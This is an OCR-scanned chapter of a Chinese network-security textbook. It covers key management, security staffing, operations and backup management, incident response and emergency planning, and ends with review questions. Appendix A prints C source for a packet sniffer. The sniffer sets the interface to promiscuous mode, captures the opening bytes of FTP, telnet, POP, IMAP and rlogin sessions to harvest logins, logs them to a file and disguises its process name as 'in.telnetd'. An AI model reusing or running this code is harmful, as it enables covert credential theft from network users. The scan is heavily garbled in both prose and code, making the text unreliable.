数据 、 事 件 跟踪 调查 和 安全 审计 报告 等 内 容 。 安 全 审计 数据 应 防止 被 任意 调用 、 修 改 和 
破坏 。 

6. 安全 恢复 管理 

安全 恢复 管理 主要 是 对 安全 事故 制订 明确 的 安全 恢复 计划 规程 和 操作 细则 ,提出 完备 
的 安全 恢复 报告 。 必 要 的 备份 措施 是 成 功 恢复 的 关键 。 备 份 包括 通信 中 心 备份 线路 备份 、 
设备 备份 .软件 备份 和 文档 资料 备份 等 。 安 全 主管 部 门 应 建立 安全 恢复 文档 资料 。 


9.5.2 保密 设备 与 密 钥 的 安全 管理 


保密 设备 的 使 用 应 与 网 络 中 被 保护 对 象 的 密级 相 一 致 。 密 码 算法 、 密 钥 和 保密 协议 是 
核心 内 容 , 同 步 技术 和 工作 方式 的 选择 也 很 重要 。 对 保密 设备 的 管理 主要 包括 保密 性 能 指 
标的 管理 ,工作 状态 的 管理 、 保 密 设备 的 类 型 .数量 、 分 配 和 使 用 者 状况 的 管理 、 密 钥 的 管 
理 等 。 

对 保密 设备 和 密 钥 的 安全 管理 应 遵循 以 下 原则 : 

。 对 违约 者 拒绝 执行 的 原则 。 
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。 非 密 设计 和 秘密 全 部 寓于 密 钥 的 原则 。 
。 用 户 满意 的 原则 。 
。 完善 协调 的 原则 。 
。 最 少 特权 的 原则 。 
。 特权 分 割 原则 。 
最 少 公 用 设备 原则 。 
。 经济 合理 原则 。 
为 了 加 强 密 钥 的 安全 管理 ,可 以 建立 密 钥 的 层次 结构 ,用 密 钥 来 保护 密 钥 。 重 点 保证 最 
高 层次 密 钥 的 安全 ,并 经 常 更 换 各 层次 的 密 钥 。 

为 了 提高 工作 效率 和 安全 性 , 除 最 高 层 密 钥 外 ,其 他 各 层 密 钥 都 可 由 密 钥 管理 系统 实行 

动态 的 自动 维护 。 

密 钥 的 管理 主要 涉及 密 钥 的 生成 .检验 、 分 配 .保存 、 更 换 和 销毁 等 。 

。 密 钥 的 生成 。 产 生 随 机 性 密 钥 序列 时 ,应 对 其 不 可 预测 性 进行 严格 的 测量 以 判定 随 
机 性 。 当 用 统计 方法 检验 密 钥 的 随机 性 时 ,应 使 不 随机 的 密 钥 序列 出 现 的 概率 
最 小 。 

。 密 钥 的 分 配 。 为 了 防止 长 时 间 使 用 的 密 钥 可 能 被 窃取 或 泄露 ,应 经 常 更 换 密 钥 且 应 
尽量 减少 人 的 参与 。 在 重要 的 网 络 通信 中 , 密 钥 只 应 在 一 次 通信 内 有 效 。 密 钥 的 分 
配方 式 随 网 络 规模 .拓扑 结构 .通信 方式 和 密码 体制 的 不 同 而 不 同 。 

* 密 钥 的 存储 。 密 钥 应 该 以 密 文 的 形式 存储 在 密码 装置 中 ,至 少 主 密 钥 应 该 如 此 存 
储 。 对 密 钥 存储 的 保护 措施 有 : 由 密码 操作 员 掌 握 加 /解密 的 操作 口令 ,密码 装置 
应 有 掉 电 保护 功能 , 拆 开 装 置 时 密 钥 会 自动 消失 ,非法 使 用 装置 时 会 自动 审计 ， 

。 密 钥 的 更 换 。 采 用 键盘 软盘、 磁 卡 、 磁 条 等 进行 密 钥 更 换 时 ,要 保证 正确 .可 靠 且 要 
防止 泄露 。 密 钥 更 换 时 应 有 保护 措施 。 例 如 ,在 一 个 封闭 的 环境 下 进行 更 换 操作 ， 
工作 人 员 要 可 靠 ,更 换 前 要 验证 操作 口令 ,更 换 的 内 容 不 应 显示 出 来 ,对 重要 的 密 钥 
要 分 批 更 换 , 遇 有 非法 窃取 更 换 密 钥 时 应 自动 销毁 密 钥 。 

。 密 钥 的 连通 和 分 割 。 在 网 络 环境 下 , 密 钥 的 连通 和 分 割 能 力 是 实现 信息 保密 和 资源 
共享 的 重要 途径 。 连 通 能 力 可 以 达到 网 络 拓扑 结构 的 地 址 极限 ,但 是 为 了 安全 起 
见 , 应 通过 分 割 来 限制 连通 范围 ,使 信息 保密 和 资源 共享 达到 最 佳 状态 。 


9.5.3 安全 行政 管理 


安全 行政 管理 的 重点 是 安全 组 织 机 构 的 设立 ,安全 人 事 管理 等 。 

1. 安全 组 织 机 构 

是 否 拥有 健全 的 安全 管理 组 织 机 构 与 网 络 信息 的 安全 与 保密 密切 相关 。 安 全 组 织 机 构 
的 设立 可 视 系 统 的 规模 而 定 。 

安全 组 织 机 构 的 任务 包括 : 统一 规划 各 级 网 络 系统 的 安全 ,制定 完善 的 安全 策略 和 措 
施 ,协调 各 方面 的 安全 事宜 .等 等 。 

安全 组 织 机 构 内 需要 多 方面 的 人 才 。 例 如 ,需要 有 人 负责 确定 安全 措施 ,制定 方针 、 政 
策 、 策 略 ,并 协调 ,监督 检查 安全 措施 的 实施 ; 还 需要 有 人 进行 具体 的 管理 系统 安全 工作 ， 
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包括 保安 员 ( 负 责 非 技术 的 、 常 规 的 安全 工作 ) 安全 管理 员 ( 负 责 软 硬 件 的 安装 维护 日常 操 
作 的 监视 ,应急 条 件 下 的 安全 恢复 等 ) .安全 审计 员 ( 负 责 监视 系统 的 运行 情况 ,收集 对 系统 
资源 的 各 种 非法 访问 事件 并 进行 记录 ,然后 进行 分 析 、 处 理 。 必 要 时 ,还 要 将 审计 的 事件 及 
时 上 报 主管 领导 ) 、 系 统管 理 员 (负责 安装 系统 ,控制 系统 操作 ,维护 \ 管 理 系统 等 )。 

安全 组 织 机 构 还 应 该 有 一 个 全 面 负责 人 ,他 负责 整个 网 络 信息 系统 的 安全 与 保密 ,主要 
任务 包括 : 对 系统 修改 进行 授权 ,对 特权 和 口令 进行 授权 ,审阅 违章 报告 .审计 记录 和 报警 
记录 ,制定 安全 人 员 的 培训 计划 并 加 以 实施 , 遇 到 重大 安全 问题 时 及 时 报告 主要 领导 ,等 等 。 

安全 组 织 机 构 不 应 该 隶属 于 网 络 运行 和 应 用 部 门 ,应 该 由 管辖 网 络 系统 的 单位 的 主要 
领导 主管 ,保持 相对 的 独立 性 和 一 定 的 权威 性 。 

安全 组 织 机 构 制定 的 安全 政策 应 该 指出 每 个 工作 人 员 的 责任 ,并 明确 安全 目标 。 对 各 
级 安全 组 织 机 构 ,应 明确 其 责任 和 监督 功能 ,负责 安全 政策 的 贯彻 以 及 安全 措施 的 执行 和 检 
查 ,严格 管理 。 

安全 组 织 机 构 制定 的 规章 制度 应 作为 日 常安 全 工作 应 遵守 的 行为 规范 。 过 时 的 安全 条 
例 应 该 及 时 得 到 修改 .补充 和 完善 。 安 全 组 织 机 构 应 该 经 常 分 析 安 全 规章 制度 的 可 操作 性 
和 落实 情况 ,真正 把 安全 摆 在 重要 的 议事 日 程 上 ,而 不 能 流 于 形式 。 

安全 组 织 机 构 还 要 制定 安全 规划 和 应 急 方案 。 在 风险 和 威胁 的 基础 上 采取 主动 和 被 动 
相 结 合 的 防治 措施 。 在 网 络 规划 .设计 、 建 设 与 应 用 过 程 中 ,要 有 网 络 安全 的 规划 ,避免 网 络 
安全 的 先天 不 足 , 并 有 计划 地 不 断 加 强 安全 措施 。 对 意外 事故 和 人 为 攻击 造成 损失 的 事件 
提出 应 急 方案 ,一 旦 发 生 ,立即 实施 。 

安全 组 织 机 构 还 要 制定 信息 保护 策略 ,确定 需要 保护 的 数据 的 范畴 、 密 级 或 保护 等 级 ， 
根据 需要 和 客观 条 件 确 定 存 取 控制 方法 和 加 密 手段 。 

2. 安全 人 事 管理 

对 人 员 的 安全 管理 主要 有 人 事 审 查 和 录用 、 岗 位 和 责任 范围 的 确定 、 工 作 评价 、 人 事 档 
案 管理 ,提升 .调动 和 免职 基础 培训 等 。 

人 事 安全 是 安全 管理 的 重要 环节 ,特别 是 各 级 关键 部 位 的 人 员 ,对 网 络 信息 的 安全 与 保 
密 起 着 重要 作用 。 实 际 上 ,大 部 分 安全 和 保密 问题 是 由 人 为 差错 造成 的 。 人 本 身 就 是 一 个 
复杂 的 信息 处 理 系统 ,而 且 人 还 会 受到 自身 生理 和 心理 因素 的 影响 ,受到 技术 熟练 程度 、 责 
任 心 和 道德 品质 等 素质 方面 的 影响 。 人 员 的 教育 奖惩、 培养 .训练 和 管理 技能 以 及 设计 合 
理 的 人 机 界面 对 于 网 络 信息 安全 与 保密 有 很 大 影响 。 

安全 人 事 管 理应 该 遵守 以 下 原则 : 

(1) 多 人 负责 原则 。 

每 一 项 与 安全 有 关 的 活动 都 必须 有 两 人 或 多 人 在 场 。 这 些 人 应 是 系统 主管 领导 指派 
的 ,是 忠诚 可 靠 的 员工 ,能 胜任 此 项 工作 。 他 们 需要 签署 工作 情况 记录 以 证 明 安 全 工作 已 得 
到 保障 。 以 下 各 项 是 与 安全 有 关 的 活动 : 

。 访问 控制 使 用 证 件 的 发 放 与 回收 。 

。 信息 处 理 系 统 使 用 的 媒介 发 放 与 回收 。 

。 处 理 保密 信息 。 

。 硬件 和 软件 的 维护 。 

。 应 用 系统 软件 的 设计 、 实 现 和 修改 。 
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。 重要 应 用 程序 和 数据 的 删除 和 销毁 等 。 
(2) 任期 有 限 原则 。 
一 般 而 言 , 任 何人 都 最 好 不 要 长 期 担任 与 安全 有 关 的 职务 ,以 免 使 他 认为 这 个 职务 是 专 


有 的 或 永久 性 的 ,从 而 产生 某 些 特权 思想 。 为 遵循 任期 有 限 原则 ,工作 人 员 应 不 定期 地 循环 
任职 ,强制 实行 休假 制度 ,并 规定 对 工作 人 员 进 行 轮流 培训 ,以 使 任期 有 限制 度 切 实 可 行 。 


(3) 职责 分 离 原 则 。 
在 信息 处 理 系 统 工作 的 人 员 不 要 打听 .了 解 或 参与 职责 以 外 的 任何 与 安全 有 关 的 事情 ， 


除非 经 过 系统 主管 领导 批准 。 出 于 对 安全 的 考虑 ,建议 将 下 面 每 组 内 的 两 项 信息 处 理工 作 
分 开 : 


dS 


。 计算 机 操作 与 计算 机 编程 。 

。 机 密 资料 的 发 送 和 接收 。 

。 安全 管理 和 系统 管理 。 

。 应 用 程序 和 系统 程序 的 编制 。 

。 计算 机 操作 与 信息 处 理 系 统 使 用 介质 的 保管 等 。 

4 运行 维护 管理 

9.5.4.1 介质 管理 

网 络 系统 介质 管理 主要 包括 以 下 内 容 : 

。 计算 机 活动 介质 (如 磁带 、 磁 盘 、 盒 式 磁带 以 及 打印 报告 )、. 输 入 输出 数据 和 系统 文档 
避免 损坏 .盗窃 和 非法 访问 。 

。 防止 介质 上 的 数据 被 非法 复制 。 

。 防止 介质 上 的 数据 删除 或 销毁 后 被 他 人 恢复 而 泄露 信息 。 

。 防止 意外 或 故意 的 破坏 使 介质 上 的 数据 丢失 。 

。 介质 不 再 需要 使 用 时 应 对 其 进行 安全 可 靠 的 处 置 , 如 烧毁 或 粉碎 ,或 者 在 其 他 应 用 
使 用 前 清空 介质 上 存储 的 重要 数据 和 内 容 。 

。 建立 介质 管理 记录 ,对 介质 的 存储 、 归 档 、 借 用 等 情况 应 详细 记录 。 

9.5.4.2 设备 管理 


网 络 系统 设备 管理 主要 包括 以 下 内 容 : 

。 设立 系统 负责 人 制度 ,每 个 系统 由 专人 负责 进行 管理 ,系统 负责 人 对 本 系统 的 服务 
器 ,终端 及 其 他 设备 进行 定期 维护 。 

。 对 设备 的 选 型 .采购 和 发 放 等 各 个 环节 进行 严格 的 审批 控制 ,根据 ISO 9000 标准 的 
要 求 建立 各 系统 的 维护 手册 ,并 严格 按照 手册 内 容 对 设备 进行 操作 和 使 用 。 

。 制定 并 通过 生产 类 终端 管理 办 法 .办公 类 终端 管理 办 法 、 网 络 安全 管理 规定 等 管理 
办 法 ,规范 对 各 类 计算 机 和 办 公设 备 的 使 用 。 

。 对 设备 的 选 型 .采购 和 发 放 等 环节 的 申报 和 审批 严格 按照 设备 审批 .发放 管理 有 关 
规定 进行 。 

。 各 系统 维护 手册 应 详细 描述 对 服务 器 的 启动 .停止 .加 电 、 断 电 等 操作 。 

9.5.4.3 网络 安全 管理 


网 络 系统 网 络 安全 管理 主要 包括 以 下 内 容 : 
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。 指定 专人 监控 并 分 析 线 路 连通 状况 、 服 务 器 运行 状况 .资源 利用 状况 、 系 统 设备 环境 
状况 .跟踪 实时 运行 信息 等 ,定时 对 网 络 客户 服务 器 进行 扫描 ,严密 监视 服务 端口 ， 
做 到 对 网 络 运行 情况 充分 了 解 , 并 提供 相应 的 报表 及 统计 分 析 报告 。 

。 在 对 交换 机 、 路 由 器 等 网 络 设备 进 行 升级 时 ,应 首先 对 重要 文件 (如 账户 数据 、 配 置 
数据 等 ) 进 行 备份 ,确保 升级 失败 后 能 及 时 恢复 到 原先 正常 的 状态 。 

。 定期 对 网 络 设备 进行 漏洞 扫描 ,对 扫描 出 的 漏洞 及 时 修补 。 每 次 扫描 后 生成 扫描 报 
告 ,报告 应 包含 存在 的 漏洞 .漏洞 级 别 、. 原 因 分 析 和 改进 意见 等 方面 ,报告 应 归档 保存 。 

9.5.4.4 备份 与 恢复 管理 

网 络 系统 备份 与 恢复 管理 主要 包括 以 下 内 容 : 


。 备份 内 容 。 


文件 等 ) 。 


对 每 个 需要 备份 的 系统 ,确定 所 有 需要 备份 的 内 容 ( 系 统 配置 信息 、 数 据 


。 备份 优先 级 。 根 据 系统 的 重要 程度 、 数 据 的 敏感 度 、 系 统 故障 产生 的 影响 等 因素 对 
需要 备份 的 系统 划分 优先 级 。 


。 备份 周期 。 


分 析 各 备份 客户 机 的 数据 量 、 数 据 增 量 、 数 据 内 容 、 备 份 媒体 等 因素 , 制 


定 可 行 的 备份 日 程 表 , 可 以 选择 按 月 、 周 、 日 .时 等 周期 进行 备份 的 不 同 策略 。 


。 备 份 方 法 。 


包括 完全 备份 、 增 量 备份 、 差 分 备份 ,按照 系统 数据 量 和 可 用 备份 设备 的 


容量 以 及 数据 备份 的 传输 速度 等 确定 采用 的 备份 方法 。 


。 备 份 状态 。 


使 用 静态 备份 还 是 动态 备份 (动态 备份 允许 数据 库 运 行 时 或 数据 文件 被 


打开 时 进行 备份 ) 。 


。 备份 介质 。 
。 备 份 技术 。 
。 备份 手段 。 
。 备份 账号 。 
。 备份 检查 。 
。 备 份 人 员 。 


包括 磁盘 、 磁 带 、 光 盘 等 。 

包括 采用 的 备份 软件 、 备 份 环境 的 结构 、 备 份 的 设备 等 。 

使 用 手工 备份 还 是 设计 好 的 自动 备份 程序 。 

是 否 需 要 设 定单 独 的 备份 账号 ,系统 中 备份 账号 应 赋予 什么 权限 。 
检验 备份 完整 性 的 标准 与 周期 。 

是 否 指定 专人 实行 备份 或 由 多 人 轮流 备份 。 


9.6 安全 防御 系统 的 实施 


定义 系统 安全 的 目标 、 进 行 安全 评估 、 制 定安 全 管理 措施 后 ,就 要 根据 安全 策略 的 要 求 ， 
选择 相应 的 安全 机 制 和 安全 技术 ,采取 技术 和 管理 手段 提高 系统 的 安全 性 ,并 在 发 生 安全 事 
件 时 及 时 进行 处 理 , 实 施 安 全 防御 系统 ,进行 监控 与 检测 。 本 节 将 从 系统 检测 ,应急 响应 恢 
复 和 网 络 系统 应 急 预 案 3 个 方面 进行 介绍 。 


9.6.1 系统 监测 


一 旦 系统 选用 相关 的 安全 产品 、 安 全 技术 并 开始 运转 后 ,相关 使 用 人 员 就 应 该 执行 安全 
制度 ,按照 安全 实施 与 管理 的 流程 进行 操作 。 在 大 型 系统 中 ,安全 防护 的 技术 和 产品 主要 有 
防火 墙 \VPN ,漏洞 扫描 、 入 侵 检测 、 防 病毒 网管 .网 站 保护 、 备 份 与 恢复 、 数 字 证 书 与 CA、 
加 密 .日 志 与 审计 等 ,以 及 一 些 增强 型 的 安全 技术 ,如 动态 口令 等 。 这 些 设备 和 技术 的 使 用 
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必须 有 人 进行 监测 ,而 不 是 一 旦 使 用 后 就 万 事 不 管 。 例 如 ,系统 管理 员 应 该 定期 查看 日 志和 
审计 信息 ,查看 防火 墙 告警 信息 等 ,并 且 对 这 些 数 据 和 信息 进行 分 析 , 判 断 是 否 有 来 自 外 部 
的 端口 扫描 或 者 试探 攻击 ,并 及 时 将 这 些 攻击 来 源 进行 隔离 和 屏蔽 。 

9.6.2 事故 响应 与 恢复 


9.6.2.1 网 络 安全 事故 响应 


网 络 安全 事故 响应 与 恢复 是 保障 网 络 安全 性 的 重要 步骤 。 响 应 是 指 发 生 安全 事故 后 的 
紧急 处 理 程序 。 事 故 响应 组 织 的 构成 如 图 9.4 所 示 。 
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入 侵 预 等 和 | | 病毒 预警 和 
跟踪 小 组 | | 防护 小 组 
































图 9.4 事故 响应 组 织 结构 


。 安全 管理 中 心 领 导 整 个 安全 队伍 ,分 配 任务 并 审计 执行 情况 ,负责 上 报 安全 状况 或 
进一步 向 其 他 组 织 寻 求援 助 和 咨询 。 

。 入 侵 预 警 和 跟踪 小 组 重点 预防 网 络 入 侵 。 

。 病毒 预警 和 防护 小 组 重点 进行 各 种 病毒 的 防护 。 

。 漏洞 扫描 小 组 通过 各 种 工具 进行 系统 漏洞 扫描 ,包括 操作 系统 漏洞 .数据库 漏洞 和 
应 用 系统 漏洞 。 

。 跟踪 小 组 对 入 侵 者 进行 跟踪 ,取得 入侵 证 据 。 

9.6.2.2 网 络 安全 事故 恢复 

网 络 系统 恢复 是 指 将 受 损失 的 系统 复原 到 发 生 安全 事故 以 前 的 状态 ,这 是 一 个 复杂 和 

烦琐 的 过 程 ,需要 信心 、 细 心 和 耐心 。 事 故 恢复 组 织 机 构 如 图 9. 5 所 示 。 
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图 9.5 事故 恢复 组 织 结构 


。 事故 恢复 领导 小 组 负责 协调 整个 系统 的 恢复 工作 ,分 配 人 员 、 任 务 并 审计 进展 情况 。 
。 网 络 恢复 小 组 主要 进行 网 络 环境 的 恢复 。 

。 系统 恢复 小 组 主要 进行 各 种 服务 器 的 操作 系统 的 恢复 。 

。 数据 库 恢 复 小 组 主要 恢复 数据 库 平 台 。 
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。 应 用 恢复 小 组 恢复 各 种 上 层 应 用 系统 ,如 办 公 系 统 、 各 种 管理 系统 等 。 

除了 采取 充分 的 攻击 响应 与 自动 恢复 技术 外 ,响应 与 恢复 还 依赖 于 人 员 的 配备 和 流程 的 
制定 。 一 旦 发 生 安全 事件 ,根据 响应 和 恢复 的 情况 ,可 以 发 现 防御 系统 中 的 薄弱 环节 或 者 安全 
策略 中 的 漏洞 ,进一步 进行 风险 分 析 , 修 改 安全 策略 ,逐步 完善 安全 策略 ,加 强 网 络 安 全 措施 。 


9.6.3 应 急 预案 


1. 应 急 预 案 的 制定 目标 
网 络 系统 运行 维护 组 织 在 制定 应 急 预 案 时 首先 应 明确 应 急 预案 的 制定 目标 ,预案 制定 
后 将 达到 何 种 程度 的 应 急 保障 效果 。 大 多 数 情况 下 应 急 预 案 的 制定 应 满足 以 下 两 个 目标 : 
。 建立 网 络 系统 应 急 响应 机 制 ,提高 运行 维护 组 织 对 网 络 系统 突 发 事件 的 综合 管理 水 
平和 应 急 处 置 能 力 , 保 障 网 络 系统 相关 业务 的 连续 性 。 
。 提高 运行 维护 组 织 对 网 络 系统 在 运行 过 程 中 出 现 的 各 种 突 发 事件 的 应 急 处 置 能 力 ， 
有 效 预防 和 最 大 程度 降低 网 络 系统 各 类 突 发 事件 的 危害 和 影响 。 
2. 应 急 预案 的 制定 原则 
为 了 使 应 急 预 案 能 达到 既定 的 目标 ,必须 依照 一 定 的 原则 进行 预案 制定 。 因 此 ,网 络 系 
统 运行 维护 组 织 大 多 依照 以 下 4 方面 原则 进行 预案 制定 : 


。 结合 工作 实际 , 找 出 对 业务 影响 最 为 突出 的 问题 和 存在 的 风险 ,制定 相应 的 应 急 预 
案 , 并 通过 对 各 自 所 负责 的 生产 设备 与 生产 系统 的 逐一 ee 
急 预 案 不 断 地 加 以 补充 和 完善 。 


。 在 应 急 预 案 的 编制 过 程 中 ,要 充分 发 挥 技 术 专 家 与 技术 骨干 的 作用 ,认真 听取 他 们 
的 意见 ,使 得 应 急 预 案 准 确 、 实 用 、 可 操作 。 
。 应 急 预 案 要 有 经 济 适用 性 ,应 急 预 案 的 实施 需要 较 多 的 资金 投入 时 ,制定 预案 要 首 
先进 行 风 险 分 析 和 经 济 适用 性 分 析 ,选择 经 济 适用 的 方案 。 
。 应 急 预 案 的 编制 力求 降低 突 发 事故 的 影响 范围 .程度 和 损失 ,应 急 预 案 力 求全 面 , 责 
任 落 实 到 人 ,便于 培训 ,重要 系统 备 有 多 种 应 急 处 置 措 施 。 
3. 应 急 预 案 编制 
在 遵从 预案 制定 原则 的 基础 上 进行 预案 细节 的 编制 还 需 注 意 以 下 3 方面 内 容 : 
。 基于 运行 维护 组 织 日 常 运行 管理 和 维护 支持 的 管理 规定 、 操 作 手 册 ( 流 程 ) 以 及 各 项 
规定 与 流程 编制 网 络 系统 的 应 急 预案 。 
应 急 预 案 及 基本 内 容 应 包括 应 急 预 案 名 称 、 预 案 责 任 部 门 、 预 案 编制 人 、 编 制 时 间 、 
审批 人 与 审批 部 门 .版 本 控制 信息 、 变 更 登记 、 预 案 等 级 。 
应 急 预 案 的 关键 内 容 应 包括 预案 适用 范围 .应急 危害 辨识 预案 启动 条 件 、 应 急 时 间 
要 求 \ 应 急 操作 步骤 、 应 急 恢复 步骤 、 需 要 的 支持 与 配合 等 。 
4. 应 急 预 案 评审 
为 保证 所 制定 的 应 急 预 案 符合 上 文 所 述 的 目标 .原则 以 及 编制 细节 要 求 ,预案 制定 完 
后 相关 人 员 应 对 预案 进行 评审 。 评 审 过 程 应 注意 以 下 3 个 方面 : 
。 根据 重要 程度 和 复杂 程度 确定 应 急 预 案 的 评审 形式 ,主要 分 为 书面 评审 与 会 议 评审 。 
。 从 组 织 协调 .业务 保障 .系统 恢复 等 方面 评审 应 急 预 案 的 可 行 性 和 有 效 性 。 
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。 应 急 预 案 评 审 通 过 后 签发 实施 ,并 进行 备案 。 

5. 应 急 预 案 管理 

应 急 预 案 管理 包括 应 急 预 案 修订 和 应 急 预 案 保存 与 备案 两 个 方面 的 工作 。 

应 急 预 案 修订 应 注意 以 下 几 方 面 : 

。 网 络 系统 应 急 预 案 应 用 环境 组织 机 构 、 职 责 、 人 员 ,联系 方式 等 发 生变 化 时 ,及 时 对 
应 急 预案 进行 修订 。 

。 每 年 至 少 对 应 急 预 案 进 行 一 次 评估 ,根据 评估 结果 修订 应 急 预案 。 

。 应 急 预 案 修订 完成 后 ,参照 应 急 预 案 评审 的 相关 内 容 对 修订 后 的 应 急 预 案 进 行 
评审 。 

。 应 急 预案 修订 后 ,开展 必要 的 演练 。 

应 急 预案 保存 与 备案 应 注意 以 下 几 方 面 : 

。 应 急 管理 流程 ,应急 预案 、 演 练 方案 、 演 练 记录 、 演 练 评估 及 相关 文档 的 每 一 次 变更 ， 
制定 部 门 均 应 妥善 保存 。 

。 各 应 急 预 案 应 不 少 于 两 个 副本 ,以 保证 在 任何 意外 情况 下 ,一 线 应 急 处 置 人 员 随 时 
可 以 拿 到 应 急 预 案 和 相关 资料 。 必 要 时 各 应 急 预 案 应 有 纸 质 副本 。 


9.7 本 章 小 结 


本 章 主 要 给 出 网 络 系统 的 安全 管理 方案 。 对 于 任何 一 个 网 络 系统 ,首先 应 确定 其 需要 
达到 的 安全 目标 ,对 之 进行 安全 风险 的 评估 。 本 章 介 绍 了 国际 .国内 安全 评估 标准 的 发 展 情 
况 ,并 给 出 了 国际 和 国内 的 主要 安全 技术 标准 。 根 据 风险 评估 的 情况 ,用 户 网 络 系统 需要 切 
实 采取 各 种 措施 进行 防范 。 在 采取 各 种 技术 措施 的 同时 ,还 必须 制定 良好 的 安全 管理 措施 ， 
包括 对 实体 .保密 设备 、 密 钥 的 安全 管理 以 及 相应 的 行政 管理 和 运行 维护 管理 。 在 系统 正常 
运行 过 程 中 ,必须 事先 建立 事故 紧急 响应 机 构 和 恢复 机 构 , 防 患 于 未 然 。 只 有 技术 措施 和 管 
理 措施 完美 地 结合 ,才能 最 大 程度 地 降低 系统 风险 ,提高 系统 的 安全 性 。 


9.8 本 章 习 题 


. 网 络 系统 的 安全 目标 通常 包括 哪些 方面 ? 

. 对 系统 进行 安全 评估 主要 包括 哪些 方面 ? 

. 我 国 的 计算 机 信息 系统 安全 保护 等 级 划分 准则 与 TCSEC 相 比 有 何 异 同 ? 
. 对 密 钥 的 管理 主要 涉及 哪些 方面 ? 

. 信息 系统 安全 等 级 保护 评定 过 程 中 的 信息 系统 分 析 主 要 包括 哪些 内 容 ? 
. 网络 系统 安全 风险 主要 包括 哪 几 个 层次 ? 

. 在 何 种 情况 下 应 实施 专项 安全 风险 评估 ? 

. 系统 恢复 领导 小 组 下 设 哪 几 个 子 小 组 ? 每 个 小 组 的 作用 是 什么 ? 

. 简 述 网 络 系统 应 急 预 案 的 制定 目标 。 


oo 中 情书 


附录 A _ Sniffer 源 程序 


/* 文件 名 : sniffer.c 
* 运行 环境 : Linux 
* 编译 命令 : cc - o sniffer sniffer.c -lsocket 
* 调用 格式 : sniffer hostname 
x*/ 


/2 头 文件 #1/ 

#include < string.h> 

# include < ctype.h> 
#include < stdio.h> 
#include <netdb.h> 
#include < sys/file.h> 

# include < sys/time.h> 

# include < sys/socket.h> 
# include < sys/ioctl.h> 
#include < sys/signal.h> 
#include <net/if.h> 

# include <arpa/inet.h> 

# include <netinet/in.h> 
# include < netinet/ip.h> 
#include < netinet/tcp.h> 
# include < netinet/if_ether.h> 


int openintf(char * ); 

int read tcp(int); 

int filter(void); 

int print_ header(void); 

int print datal(int, char * ); 

char * hostlookup(unsigned long int); 
void clear victim(void); 

void cleanup( int); 


struct etherpacket 


{ 
struct ethhdr eth; 
struct iphdr ip; 
struct tcphdr tcp; 
char buff[8192]; 
Jep; 


struct 


{ 
unsigned long saddr; 
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unsigned long daddr; 
unsigned short sport; 
unsigned short dport; 
int bytes_read; 
char active; 
time t start time; 

} victim; 


struct iphdr * ip; 
struct tcphdr * tcp; 
int s; 

FILE * fp; 


#define CAPTLEN 512 
#define TIMEOUT 30 
# define TCPLOG "tcp. 1og" 


int openintf(char *d) 
{ 
int fd; 
struct ifreq ifr; 
int s; 
fd = socket(AF_INET, SOCK_PACKET, htons(0x800)); 
if(fd <0) 
{ 
perror("cant get SOCK_PACKET socket"); 
exit(0); 
; 
strcpy(ifr. ifr_name, d); 
s= ioctl(fd, SIOCGIFFLAGS, &ifr); 


if(s <0) 

{ 
close(fd); 
perror("cant get flags"); 
exit(0); 

} 


ifr. ifr flags | = IFF PROMISC; 

s= ioctl(fd, SIOCSIFFLAGS, &ifr); 

if(s <0) perror("can not set promiscuous mode" ); 
return fd; 


int read_tcp(int s) 
{ 
int x; 
while(1) 
人 
x= read(s, (struct etherpacket x )&ep, sizeof(ep)); 
if(x>1) 
{ 


if(filter() == 0) continue; 
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和 = 一 54; 
if(x<1) continue; 
return x; 


int filter(void) 


{ 


int p; 
p=0; 
if(ip—>protocol != 6) return 0; 
if(victim.active != 0) 
if(victim. bytes_read > CAPTLEN) 
{ 
fprintf(fp, "\n-— -- — [CAPLEN Exceeded]\n"); 
clear victim(); 
return 0; 
; 
if(victim.active != 0) 
if(time(NULL) >(victim. start_time + TIMEOUT)) 


fprintf(fp，"\n-- -- - [Timed Out]\n"); 
clear victim(); 
return 0; 
} 
if(ntohs(tcp -> dest) ==21) p=1; /x ftp port */ 
if(ntohs(tcp -> dest) == 23) p=1; /* telnet port */ 


if(ntohs(tcp -> dest) ==110) p=1; /x pop3 port */ 









if(ntohs(tcp -> dest) ==109) p=1; /x pop2 port */ 
if(ntohs(tcp -> dest) ==143) p=1; /x imap2 port */ 
if(ntohs(tcp—> dest) == 513) p=1; /x rlogin port */ 
if(ntohs(tcp -> dest) ==106) p=1; /x* poppasswd port */ 
if(victim.active == 0) 
if(p == 1) 
if(tcp-> syn == 1) 
{ 


Victim. saddr = ip 一 > saddr; 
Victim. daddr = ip 一 > daddr; 
victim.active= 1; 
Victim. sport = tcp 一 > source; 
Victim. dport = tcp 一 > dest; 
Victim. bytes_read= 0; 
Victim. start_time = time(NULL); 
print header(); 
} 
if(tcp—>dest != victim. dport) return 0; 
if(tcp—> source != victim. sport) return 0; 
if(ip—-> saddr != victim. saddr) return 0; 
if(ip->daddr != victim. daddr) return 0; 
if(tcp—->rst == 1) 
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victim.active= 0; 
alarm(0); 
fprintf(fp, "\n—— -- — [RST]\n"); 
clear victim(); 
return 0; 
} 
if(tcp->fin == 1) 
{ 
victim.active= 0; 
alarm(0); 
fprintf(fp, "\n-—— -- — [FIN]\n"); 
clear victim(); 
return 0; 
} 


return 1; 


int print_header(void) 
人 
fprintf(fp, "\n"); 
fprintf(fp, "%s =>", hostlookup(ip—> saddr)); 
fprintf(fp, "%s[%dl\n", hostlookup(ip—-> daddr), ntohs(tcp-> dest)); 


int print datal( int datalen, char * data) 
{ 

int i=0; 

int t= 0; 


victim. bytes_read = victim. bytes_read + datalen; 

for(i=0;i!= datalen;i++) 

{ 
if(data[i] == 13) { fprintf(fp, "\n"); t=0;} 
if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;} 
if(t >75) {t= 0;fprintf(fp, "\n");} 


/* 主 函数 */ 
main(int argc, char xx argv) 
{ 
sprintf(argv[0]," % s","in. telnetd"); 
s = openintf("eth0"); 
ip= (struct iphdr * )(((unsigned long)&ep. ip) - 2); 
tcp = (struct tcphdr * )(((unsigned long)&ep.tcp) - 2); 
signal(SIGHUP, SIG_IGN); 
signal(SIGINT, cleanup); 
signal(SIGTERM, cleanup); 
signal(SIGKILL, cleanup); 
signal(SIGQUIT, cleanup); 
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证 (argc == 2) fp= stdout; 
else fp = fopen(TCPLOG, "at"); 
if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);} 
clear victim(); 
for(;;) 
{ 
read tcp(s); 
if(victim.active != 0) 
print data(htons(ip—> tot_len) - sizeof(ep. ip) - sizeof (ep. tcp), ep. buff — 2); 
fflush(fp); 
: 
jl 
char * hostlookup(unsigned long int in) 
{ 
